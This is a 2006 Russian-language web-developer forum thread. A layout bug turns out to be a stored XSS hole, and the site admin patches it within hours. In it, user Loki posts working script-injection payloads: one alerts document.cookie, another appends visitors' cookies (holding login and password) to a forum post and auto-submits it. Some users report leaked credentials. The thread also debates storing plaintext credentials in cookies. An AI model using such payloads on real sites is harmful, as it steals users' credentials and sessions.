Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5. На примерах. Авторы: Кузнецов М.В., Симдянов И.В., Голышев С.В. C++. Мастер-класс в задачах и примерах. Авторы: Кузнецов М.В., Симдянов И.В. Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Разное

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: форум развалился
 
 автор: AlexSol   (30.08.2006 в 09:54)   письмо автору
 
 

при ответе на тему http://softtime.ru/forum/read.php?id_forum=4&id_theme=23618&page=1

   
 
 автор: Unkind™   (30.08.2006 в 10:00)   письмо автору
 
   для: AlexSol   (30.08.2006 в 09:54)
 

У меня немного по-другому "развалился"...Нет так сильно, чекбокса не было...

   
 
 автор: AlexSol   (30.08.2006 в 10:04)   письмо автору
 
   для: Unkind™   (30.08.2006 в 10:00)
 

болезнь прогрессирует?

   
 
 автор: krollik   (30.08.2006 в 10:20)   письмо автору
 
   для: AlexSol   (30.08.2006 в 10:04)
 

у меня развалился также как у тебя =)
Наверное этот вид болезни может потстраиваться под каждый вид браузера =)

   
 
 автор: AlexSol   (30.08.2006 в 10:24)   письмо автору
 
   для: krollik   (30.08.2006 в 10:20)
 

>у меня развалился также как у тебя =)
>Наверное этот вид болезни может потстраиваться под каждый вид браузера =)

под каждый вид пользователя =))
у меня во всех браузерах так.

   
 
 автор: Unkind™   (30.08.2006 в 13:24)   письмо автору
 
   для: Unkind™   (30.08.2006 в 10:00)
 

А не, может не заметил с первого раза) Тоже есть чекбокс.

   
 
 автор: cheops   (30.08.2006 в 12:05)   письмо автору
 
   для: AlexSol   (30.08.2006 в 09:54)
 

Угу, видать какой-то невидимый символ засобачен - спасибо, будем разбираться.

   
 
 автор: Loki   (30.08.2006 в 14:16)   письмо автору
 
   для: cheops   (30.08.2006 в 12:05)
 

Символ вполне видимый: просто в тексте закрыт комментарий и скрипт
//-->
</script>
так что весь яваскрипт далее просто выводится на экран.
Кстати, при ответе на мое сообщение произойдет тоже самое;)

   
 
 автор: AlexSol   (30.08.2006 в 14:30)   письмо автору
 
   для: Loki   (30.08.2006 в 14:16)
 

шайтан....

   
 
 автор: Loki   (30.08.2006 в 16:33)   письмо автору
 
   для: Loki   (30.08.2006 в 14:16)
 

Вот любопытно мне стало...
//-->
</script><script>alert(document.cookie);</script>

   
 
 автор: Loki   (30.08.2006 в 16:38)   письмо автору
 
   для: Loki   (30.08.2006 в 16:33)
 

Фигак! Дырка!

   
 
 автор: AlexSol   (30.08.2006 в 16:47)   письмо автору
 
   для: Loki   (30.08.2006 в 16:38)
 

ну ваще....

   
 
 автор: cheops   (30.08.2006 в 18:40)   письмо автору
 
   для: Loki   (30.08.2006 в 16:38)
 

На минуту оставить нельзя - дыру найдут :)))

   
 
 автор: Trianon   (30.08.2006 в 18:49)   письмо автору
 
   для: cheops   (30.08.2006 в 18:40)
 

Какая минута? Вы в 12:05 сообщили, что в курсе дела!

   
 
 автор: cheops   (30.08.2006 в 19:00)   письмо автору
 
   для: Trianon   (30.08.2006 в 18:49)
 

Вы чего ругаетесь :)))?

PS О дыре речь там не шла - только об визуальном баге - XSS-инъекцию построил Loki.

   
 
 автор: Trianon   (30.08.2006 в 19:05)   письмо автору
 
   для: cheops   (30.08.2006 в 19:00)
 

>Вы чего ругаетесь :)))?
"да нет... не вздыхал я, Вага.... Как можно...."
))

   
 
 автор: P@Sol   (30.08.2006 в 16:46)   письмо автору
 
   для: Loki   (30.08.2006 в 16:33)
 

да...логин и пароль:(
молодец, что нашел

   
 
 автор: AlexSol   (30.08.2006 в 16:47)   письмо автору
 
   для: P@Sol   (30.08.2006 в 16:46)
 

тока я их и так знаю :)

   
 
 автор: Trianon   (30.08.2006 в 16:51)   письмо автору
 
   для: Loki   (30.08.2006 в 16:33)
 

не алертить их надо, а цеплять к тексту мессаги. пониже. В качестве подписи.

   
 
 автор: Loki   (30.08.2006 в 16:54)   письмо автору
 
   для: Trianon   (30.08.2006 в 16:51)
 

эх... жаль почтовые уведомления не работают:)

   
 
 автор: Trianon   (30.08.2006 в 16:58)   письмо автору
 
   для: Loki   (30.08.2006 в 16:54)
 

я у себя на всякий случай запретил JS .

   
 
 автор: Loki   (30.08.2006 в 17:19)   письмо автору
 
   для: Trianon   (30.08.2006 в 16:51)
 

//-->
</script>
<script>document.form.message.value = document.form.message.value + document.cookie; document.form.submit();</script>
Типа такого?))

   
 
 автор: Loki   (30.08.2006 в 17:28)   письмо автору
 
   для: Loki   (30.08.2006 в 17:19)
 

получилось:)))

   
 
 автор: Trianon   (30.08.2006 в 17:45)   письмо автору
 
   для: Loki   (30.08.2006 в 17:28)
 

ну... не так грубо, но в целом, верно.

   
 
 автор: Axxil   (30.08.2006 в 18:34)   письмо автору
 
   для: Loki   (30.08.2006 в 17:28)
 

Капец дыра...

   
 
 автор: krollik   (30.08.2006 в 17:59)   письмо автору
 
   для: Loki   (30.08.2006 в 17:19)
 

У Блин
У меня браузер лаганул и почемто мессагу отправил =)) целых несколько сек были мои реквизиты!

   
 
 автор: Loki   (30.08.2006 в 18:01)   письмо автору
 
   для: krollik   (30.08.2006 в 17:59)
 

стоять бояцца!:)

   
 
 автор: krollik   (30.08.2006 в 18:01)   письмо автору
 
   для: Loki   (30.08.2006 в 18:01)
 

Заметил? =)
Не более 3 сек висели

   
 
 автор: Loki   (30.08.2006 в 18:10)   письмо автору
 
   для: krollik   (30.08.2006 в 18:01)
 

не броузер лагнул, а я его лягнул:)

   
 
 автор: krollik   (30.08.2006 в 19:16)   письмо автору
 
   для: Loki   (30.08.2006 в 18:10)
 

Вплане? ты сделал так чтобы сразу отсылались данные?
Господин cheops данную дыру пора латать!

   
 
 автор: cheops   (30.08.2006 в 19:27)   письмо автору
 
   для: krollik   (30.08.2006 в 19:16)
 

Залатана 20 минут назад.

   
 
 автор: Axxil   (30.08.2006 в 18:32)   письмо автору
 
   для: Loki   (30.08.2006 в 17:19)
 

Вопрос к администрации:
Я тут пока дыру тестил, пароль свой засветил...
Как его можно поменять?

   
 
 автор: Axxil   (30.08.2006 в 18:32)   письмо автору
 
   для: Loki   (30.08.2006 в 17:19)
 

-

   
 
 автор: Axxil   (30.08.2006 в 18:32)   письмо автору
 
   для: Loki   (30.08.2006 в 17:19)
 

-

   
 
 автор: krollik   (30.08.2006 в 17:00)   письмо автору
 
   для: Loki   (30.08.2006 в 16:33)
 

Нифигассе дырка! =)

   
 
 автор: cheops   (30.08.2006 в 18:48)   письмо автору
 
   для: Loki   (30.08.2006 в 16:33)
 

Вот любопытно мне стало...
//
</script><script>alert(document.cookie);</script>

   
 
 автор: P@Sol   (30.08.2006 в 13:29)   письмо автору
 
   для: AlexSol   (30.08.2006 в 09:54)
 

ааа...я тоже вижу это...это заразно?

   
 
 автор: Саня   (30.08.2006 в 14:57)   письмо автору
 
   для: P@Sol   (30.08.2006 в 13:29)
 

Опера всё замечательно отображает :)

   
 
 автор: AlexSol   (30.08.2006 в 14:58)   письмо автору
 
   для: Саня   (30.08.2006 в 14:57)
 

нажми 'ответить' на первое сообщение.

   
 
 автор: Саня   (30.08.2006 в 18:51)   письмо автору
 
   для: AlexSol   (30.08.2006 в 14:58)
 

Всё равно нормально :)
Может я не успел - дырку уже залатали.

   
 
 автор: d-111   (30.08.2006 в 18:55)   письмо автору
 
   для: Саня   (30.08.2006 в 18:51)
 

Ну не переживай, я тогда тоже не успел :)

   
 
 автор: cheops   (30.08.2006 в 19:03)   письмо автору
 
   для: Саня   (30.08.2006 в 18:51)
 

Да, я за несколько минут до вашего сообщения прикрыл её наскоро... нужно подумать эффективно решение или нет...

   
 
 автор: Trianon   (30.08.2006 в 19:18)   письмо автору
 
   для: cheops   (30.08.2006 в 19:03)
 

Вы не хотите поменять аутентифицирующий токен в кукисах с пары логин/пароль на что-то менее открытое?
Не последняя ж дыра...

   
 
 автор: cheops   (30.08.2006 в 19:30)   письмо автору
 
   для: Trianon   (30.08.2006 в 19:18)
 

А смысл? Злоумышленик если захочет получить пароли форума, вряд ли остановится перед их расшифровкой...

PS Пароль его будет интересовать только один: администраторский, подходящий к другим частям сайта - такого пароля не существует. Все остальные пароли не представляют никакой ценности, так как на форуме в основном работают Web-программисты - они никогда более менее ценный пароль на форуме использовать не будут.

   
 
 автор: Trianon   (30.08.2006 в 19:37)   письмо автору
 
   для: cheops   (30.08.2006 в 19:30)
 

Здесь достаточно много наивных людей.
У которых один или почти один пароль и на форум и на аську и на почту.
Конечно, случаи, подобные тому, что произошел с akir'ой, учат.
Но ведь болезненно весьма учат, Вы не находите?

   
 
 автор: akira   (30.08.2006 в 19:52)   письмо автору
 
   для: Trianon   (30.08.2006 в 19:37)
 

Кто сказал, что у меня один пароль на все?
Просто не надо пароли хранить на mail.ru или не забывать их удалять.

   
 
 автор: Trianon   (30.08.2006 в 19:59)   письмо автору
 
   для: akira   (30.08.2006 в 19:52)
 

Я этого не утверждал.
Я сказал, что Вы стали более прагматичным, и что за это пришлось заплатить.
Вы несогласны?

А те у кого один пароль на всё - есть. Я даже убежден, что их большинство.
Слишком часто сталкивался с подобного рода вещами.
Причем у людей куда более опытных, уверяю Вас.

   
 
 автор: cheops   (30.08.2006 в 19:58)   письмо автору
 
   для: Trianon   (30.08.2006 в 19:37)
 

Так а смысл какой в шифровании пароля? Если их всё равно расшифрет любой, вопрос времени, причём не очень большого?

>Но ведь болезненно весьма учат, Вы не находите?
Нахожу, что весьма болезненно... это свойство злоумышлеников - они на мир немного другими глазами смотрят, если бы они хотя бы изредка смотрели на мир глазами своих жертв, все бы страдали меньше, в том числе и они сами.

>У которых один или почти один пароль и на форум и на аську и на почту.
Вы же сами прекрасно понимаете, что мы не можем от этого защитить каждого человека - универсальный пароль используется во множестве мест - рано или поздно он уплывёт - единственная защита более или менее вменяемая аудитория. Которую дыра позабавит, но которые ей никогда не воспользуются в своих интересах. Перекройка рабочего форума дело тоже не простое, так как можно внести новые ошибки, осуществлять её нужно только в том случае, если есть твёрдая уверенность в улучшении ситуации. Я понимаю, если бы не было альтернативы, но можно отвечать из под серого ника... без пароля и логина.

   
 
 автор: motoP@Sol   (30.08.2006 в 18:20)
 
   для: Саня   (30.08.2006 в 14:57)
 

даже miniOpera отрабатывает этот код

   
 
 автор: AlexSol   (30.08.2006 в 19:53)   письмо автору
 
   для: motoP@Sol   (30.08.2006 в 18:20)
 

тема пользуется популярностью!

   
 
 автор: cheops   (30.08.2006 в 20:02)   письмо автору
 
   для: AlexSol   (30.08.2006 в 09:54)
 

Тема здоровая, поэтому закрывается, если кто-то хочет продолжить, давайте, заведём новую, про то шифровать пароли или нет в публичных местах уже много раз обсуждали, но если нужно поднять вопрос снова - давайте в новой ветке.

   
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования